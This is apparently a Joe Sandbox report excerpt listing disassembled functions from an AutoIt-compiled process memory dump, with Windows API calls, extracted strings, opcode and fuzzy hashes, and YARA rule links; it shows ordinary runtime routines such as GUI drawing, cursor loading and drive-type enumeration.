Opcode ID: 6ce698e36ce4d0be4465467b1449b8dc2af55b22bcdef27ba7fe485ce13100fa
Instruction ID: 61f53f708891ed92d051e085202ff06e021f874dc448eeb4982d579cd78111a4
Opcode Fuzzy Hash: 6ce698e36ce4d0be4465467b1449b8dc2af55b22bcdef27ba7fe485ce13100fa
Instruction Fuzzy Hash: A2A18FB1A00219BFEB14DBA4DC4AFAF7BA9EF44714F144254FA15A72E1C770AD04CB64

Function 00C5B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C5B361
GetDriveTypeW.KERNEL32(?,00C82C4C,?,\\.\,00C80980), ref: 00C5B43E
SetErrorMode.KERNEL32(00000000,00C82C4C,?,\\.\,00C80980), ref: 00C5B59C

Strings

RAID, xrefs: 00C5B53A
SSD, xrefs: 00C5B4C9
\\.\, xrefs: 00C5B3B3
CDROM, xrefs: 00C5B472
RAMDisk, xrefs: 00C5B468
ATA, xrefs: 00C5B517
Unknown, xrefs: 00C5B45E, 00C5B502
Removable, xrefs: 00C5B490
1394, xrefs: 00C5B51E
SAS, xrefs: 00C5B548
Virtual, xrefs: 00C5B564
USB, xrefs: 00C5B533
Fixed, xrefs: 00C5B486
MMC, xrefs: 00C5B55D
SSA, xrefs: 00C5B525
ATAPI, xrefs: 00C5B510
PhysicalDrive, xrefs: 00C5B3EA
SCSI, xrefs: 00C5B509
FileBackedVirtual, xrefs: 00C5B56B
iSCSI, xrefs: 00C5B541
Network, xrefs: 00C5B47C
SATA, xrefs: 00C5B54F
Fibre, xrefs: 00C5B52C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 24be9a4a48dd2625a8b3b34cf20f9011076a83f535ddb624412975bf89096795
Instruction ID: b1591dd90584441c6747dc1241f2167b649d77b28f2ece2a731737623e283985
Opcode Fuzzy Hash: 24be9a4a48dd2625a8b3b34cf20f9011076a83f535ddb624412975bf89096795
Instruction Fuzzy Hash: 4E51FB38B4020EDBC718DB61C942A7D7FE0EB45346B644025FC06E7292E771AEC9DB59

Function 00C7A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C7A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C7A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00C7A1CC

Strings

0, xrefs: 00C7A209

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: f0f92d623a33664ae1e2076daa33e7f9a7e30acbf321de321c7bf1548c5f6450
Instruction ID: 79f99697b0454657aec9940d6c5012d8729d9ced7d90978330a10f918769588d
Opcode Fuzzy Hash: f0f92d623a33664ae1e2076daa33e7f9a7e30acbf321de321c7bf1548c5f6450
Instruction Fuzzy Hash: EB02CC30108601AFEB25CF14C848BAEBBE4FFC9714F14C619F9AD962A1D775DA44CB52

Function 00C7AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C7AF51
SetTextColor.GDI32(?,?), ref: 00C7AF55
GetSysColorBrush.USER32(0000000F), ref: 00C7AF6B
GetSysColor.USER32(0000000F), ref: 00C7AF76
CreateSolidBrush.GDI32(?), ref: 00C7AF7B
GetSysColor.USER32(00000011), ref: 00C7AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C7AFA1
SelectObject.GDI32(?,00000000), ref: 00C7AFB2
SetBkColor.GDI32(?,00000000), ref: 00C7AFBB
SelectObject.GDI32(?,?), ref: 00C7AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00C7AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C7AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00C7B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C7B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C7B086
InflateRect.USER32(?,000000FD,000000FD), ref: 00C7B0A4
DrawFocusRect.USER32(?,?), ref: 00C7B0AF
GetSysColor.USER32(00000011), ref: 00C7B0BD
SetTextColor.GDI32(?,00000000), ref: 00C7B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C7B0D9
SelectObject.GDI32(?,00C7AC1F), ref: 00C7B0F0
DeleteObject.GDI32(?), ref: 00C7B0FB
SelectObject.GDI32(?,?), ref: 00C7B101
DeleteObject.GDI32(?), ref: 00C7B106
SetTextColor.GDI32(?,?), ref: 00C7B10C
SetBkColor.GDI32(?,?), ref: 00C7B116

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 54704301d4f3f9fd830b3b9a222979a717b6ace0fe73211569bb0439b61002e2
Instruction ID: e2d7d978a3b873c1af1ff0be127d83920f12d335ce26c65f60ff70aa7ea38764
Opcode Fuzzy Hash: 54704301d4f3f9fd830b3b9a222979a717b6ace0fe73211569bb0439b61002e2
Instruction Fuzzy Hash: 51617CB1900218AFDF119FA4DC48FAE7B79EF08320F218115F929AB2A1D7759E44DF94

Function 00C78FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C790EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C790FB
CharNextW.USER32(0000014E), ref: 00C7912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C7916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C79181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C79192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C791AF
SetWindowTextW.USER32(?,0000014E), ref: 00C791FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C79211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C79242
_memset.LIBCMT ref: 00C79267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C792B0
_memset.LIBCMT ref: 00C7930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C79339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C79391
SendMessageW.USER32(?,0000133D,?,?), ref: 00C7943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00C79460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C794AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C794D7
DrawMenuBar.USER32(?), ref: 00C794E6
SetWindowTextW.USER32(?,0000014E), ref: 00C7950E

Strings

0, xrefs: 00C79478

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: e13f41b82309f344ed2045a621dc2fe6d79b29e927377c954eda7ba8484cbe93
Instruction ID: 927e13968adce177b9ec93ec349139c331e64dd4b181b882cd032959cadf3563
Opcode Fuzzy Hash: e13f41b82309f344ed2045a621dc2fe6d79b29e927377c954eda7ba8484cbe93
Instruction Fuzzy Hash: 2EE17D70900218ABDF619F55CC84FEE7BB8FF09710F10C156F929AA291D7708A85DF61

Function 00C74ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C75007
GetDesktopWindow.USER32 ref: 00C7501C
GetWindowRect.USER32(00000000), ref: 00C75023
GetWindowLongW.USER32(?,000000F0), ref: 00C75085
DestroyWindow.USER32(?), ref: 00C750B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C750DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C750F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C7511E
SendMessageW.USER32(?,00000421,?,?), ref: 00C75133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C75146
IsWindowVisible.USER32(?), ref: 00C75166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C75181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C75195
GetWindowRect.USER32(?,?), ref: 00C751AD
MonitorFromPoint.USER32(?,?,00000002), ref: 00C751D3
GetMonitorInfoW.USER32(00000000,?), ref: 00C751ED
CopyRect.USER32(?,?), ref: 00C75204
SendMessageW.USER32(?,00000412,00000000), ref: 00C7526F

Strings

tooltips_class32, xrefs: 00C750D3
(, xrefs: 00C751E0
0, xrefs: 00C74FB2

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 9c53a22983e2ec6438313ccd69ba91d9da2c6d954adc7dc6f94f2a7eafd5a6d1
Instruction ID: 31a5ac15c2ca56b7cb0e2bf238cb425167b85c61893c8a11b6b7ea19b2338911
Opcode Fuzzy Hash: 9c53a22983e2ec6438313ccd69ba91d9da2c6d954adc7dc6f94f2a7eafd5a6d1
Instruction Fuzzy Hash: 3AB16A71604740AFD754DF64C844B6FBBE4BF88310F008A1DF9A99B291DB71E909CB96

Function 00C5498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C5499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C549C2
_wcscpy.LIBCMT ref: 00C549F0
_wcscmp.LIBCMT ref: 00C549FB
_wcscat.LIBCMT ref: 00C54A11
_wcsstr.LIBCMT ref: 00C54A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C54A38
_wcscat.LIBCMT ref: 00C54A81
_wcscat.LIBCMT ref: 00C54A88
_wcsncpy.LIBCMT ref: 00C54AB3

Strings

04090000, xrefs: 00C54A6E
DefaultLangCodepage, xrefs: 00C54A9B
StringFileInfo\, xrefs: 00C54A0B
%u.%u.%u.%u, xrefs: 00C54B16
\VarFileInfo\Translation, xrefs: 00C54A30

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 1343b6a32bee0e56ef26c2c29cc4f9fd74650846e0f66eb6cadac1e002bef6aa
Instruction ID: 48b6ed2621437eba9431e380da9ce112f14e474bad74fe0b5576218fc59ec6f1
Opcode Fuzzy Hash: 1343b6a32bee0e56ef26c2c29cc4f9fd74650846e0f66eb6cadac1e002bef6aa
Instruction Fuzzy Hash: 664126769002047BEB14BB608C47EFF776CDF46315F100129FD04A6182EB349AD1B7A9

Function 00BF2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF2C8C
GetSystemMetrics.USER32(00000007), ref: 00BF2C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF2CBF
GetSystemMetrics.USER32(00000008), ref: 00BF2CC7
GetSystemMetrics.USER32(00000004), ref: 00BF2CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BF2D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BF2D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BF2D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BF2D60
GetClientRect.USER32(00000000,000000FF), ref: 00BF2D7E
GetStockObject.GDI32(00000011), ref: 00BF2D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF2DA5

Part of subcall function 00BF2714: GetCursorPos.USER32(?), ref: 00BF2727
Part of subcall function 00BF2714: ScreenToClient.USER32(00CB77B0,?), ref: 00BF2744
Part of subcall function 00BF2714: GetAsyncKeyState.USER32(00000001), ref: 00BF2769
Part of subcall function 00BF2714: GetAsyncKeyState.USER32(00000002), ref: 00BF2777

SetTimer.USER32(00000000,00000000,00000028,00BF13C7), ref: 00BF2DCC

Strings

AutoIt v3 GUI, xrefs: 00BF2D44

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 898d894ccd27fcf78ed501008616bc282c2c89c3bc451ac3490b7c803c8bce81
Instruction ID: be62673fbb4f1b074e04e2834c76ea1ce43a6808a9e9fddb3751ea758f51fd3c
Opcode Fuzzy Hash: 898d894ccd27fcf78ed501008616bc282c2c89c3bc451ac3490b7c803c8bce81
Instruction Fuzzy Hash: 49B16F7160020A9FDB14DFA8DC99BBE7BF4FB48310F204269FA15A7290DB74A954CF64

Function 00C10429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

GetForegroundWindow.USER32(00C80980,?,?,?,?,?), ref: 00C104E3
IsWindow.USER32(?), ref: 00C466BB

Strings

REGEXPCLASS, xrefs: 00C46506
LAST, xrefs: 00C46472
ALL, xrefs: 00C46622
HANDLE, xrefs: 00C4649E
INSTANCE, xrefs: 00C465FA
ACTIVE, xrefs: 00C46488
TITLE, xrefs: 00C46650
REGEXPTITLE, xrefs: 00C464B4
CLASS, xrefs: 00C464E5

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 1a439ffea72f79d91b6878bc29db250dd8eb764fc71dfba86331dfeade83243b
Instruction ID: a037acdd9de63b656d2b40ba360a7e2c248b83f034cbd3209ba33a32bba3df5c
Opcode Fuzzy Hash: 1a439ffea72f79d91b6878bc29db250dd8eb764fc71dfba86331dfeade83243b
Instruction Fuzzy Hash: F4D1B870104602DFCB04EF20C4415DAFBB5BF57348F244619F866535A6DB70FA99EB92

Function 00C7441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C744AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C7456C

Strings

GETSUBITEMCOUNT, xrefs: 00C744F7
SELECTCLEAR, xrefs: 00C745EB
GETTEXT, xrefs: 00C74515
FINDITEM, xrefs: 00C746DF
GETSELECTEDCOUNT, xrefs: 00C7454F
GETITEMCOUNT, xrefs: 00C744DE
GETSELECTED, xrefs: 00C7469A
SELECTALL, xrefs: 00C745D3
SELECTINVERT, xrefs: 00C7463C
VIEWCHANGE, xrefs: 00C7472B
DESELECT, xrefs: 00C7465A
ISSELECTED, xrefs: 00C74577
SELECT, xrefs: 00C74606

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 04b1dd5a85225c68b6978eb530f283fb2e6497e2771a758dce1fd6f166c0fd65
Instruction ID: 218a7465949644ca30328c7d85869568232077bc15ae2b0793ca192988647a3f
Opcode Fuzzy Hash: 04b1dd5a85225c68b6978eb530f283fb2e6497e2771a758dce1fd6f166c0fd65
Instruction Fuzzy Hash: D0A18F702142159FCB18EF20C851A7AB3E5FF86314F208968F96A9B7D2DB30ED09DB51

Function 00C656C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00C656E1
LoadCursorW.USER32(00000000,00007F8A), ref: 00C656EC
LoadCursorW.USER32(00000000,00007F00), ref: 00C656F7
LoadCursorW.USER32(00000000,00007F03), ref: 00C65702
LoadCursorW.USER32(00000000,00007F8B), ref: 00C6570D
LoadCursorW.USER32(00000000,00007F01), ref: 00C65718
LoadCursorW.USER32(00000000,00007F81), ref: 00C65723
LoadCursorW.USER32(00000000,00007F88), ref: 00C6572E
LoadCursorW.USER32(00000000,00007F80), ref: 00C65739
LoadCursorW.USER32(00000000,00007F86), ref: 00C65744
LoadCursorW.USER32(00000000,00007F83), ref: 00C6574F
LoadCursorW.USER32(00000000,00007F85), ref: 00C6575A
LoadCursorW.USER32(00000000,00007F82), ref: 00C65765
LoadCursorW.USER32(00000000,00007F84), ref: 00C65770
LoadCursorW.USER32(00000000,00007F04), ref: 00C6577B
LoadCursorW.USER32(00000000,00007F02), ref: 00C65786
GetCursorInfo.USER32(?), ref: 00C65796
GetLastError.KERNEL32(00000001,00000000), ref: 00C657C1

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: c091b9bb0ac9a8a80a626d1c2bf865953f5ba93b3f8bbaa426b34fa3861fd11b
Instruction ID: b984d0a5a8cc9947cd83c472dc7c880891262717f6757d579e979f9bcd18a251
Opcode Fuzzy Hash: c091b9bb0ac9a8a80a626d1c2bf865953f5ba93b3f8bbaa426b34fa3861fd11b
Instruction Fuzzy Hash: 1D415270E44319AADB209FBA8C49D6FFEF8EF51B10F10452FE519E7290DAB8A501CE51

Function 00C4B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C4B17B
__swprintf.LIBCMT ref: 00C4B21C
_wcscmp.LIBCMT ref: 00C4B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C4B284
_wcscmp.LIBCMT ref: 00C4B2C0
GetClassNameW.USER32(?,?,00000400), ref: 00C4B2F7
GetDlgCtrlID.USER32(?), ref: 00C4B349
GetWindowRect.USER32(?,?), ref: 00C4B37F
GetParent.USER32(?), ref: 00C4B39D
ScreenToClient.USER32(00000000), ref: 00C4B3A4
GetClassNameW.USER32(?,?,00000100), ref: 00C4B41E
_wcscmp.LIBCMT ref: 00C4B432
GetWindowTextW.USER32(?,?,00000400), ref: 00C4B458
_wcscmp.LIBCMT ref: 00C4B46C

Part of subcall function 00C1385C: _iswctype.LIBCMT ref: 00C13864

Strings

%s%u, xrefs: 00C4B216

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 4995e85acba601b81161a31faece1c46d56d87c5095e138aa74c32fc9ee961ff
Instruction ID: f60160bf8d9062c356af7d0c13cab9b7fc85cf618fb129c52daee40be2fa6a07
Opcode Fuzzy Hash: 4995e85acba601b81161a31faece1c46d56d87c5095e138aa74c32fc9ee961ff
Instruction Fuzzy Hash: 12A1A071204606ABD714DF64C884BEEB7E8FF48354F104629FDA9D2191EB30EE59CB91

Function 00C4BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00C4BAB1
_wcscmp.LIBCMT ref: 00C4BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 00C4BAEA
CharUpperBuffW.USER32(?,00000000), ref: 00C4BB07
_wcscmp.LIBCMT ref: 00C4BB25
_wcsstr.LIBCMT ref: 00C4BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 00C4BB6E
_wcscmp.LIBCMT ref: 00C4BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 00C4BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 00C4BBEE
_wcscmp.LIBCMT ref: 00C4BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 00C4BC26
GetWindowRect.USER32(00000004,?), ref: 00C4BC8F

Strings

@, xrefs: 00C4BA92
ThumbnailClass, xrefs: 00C4BB79, 00C4BBF9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

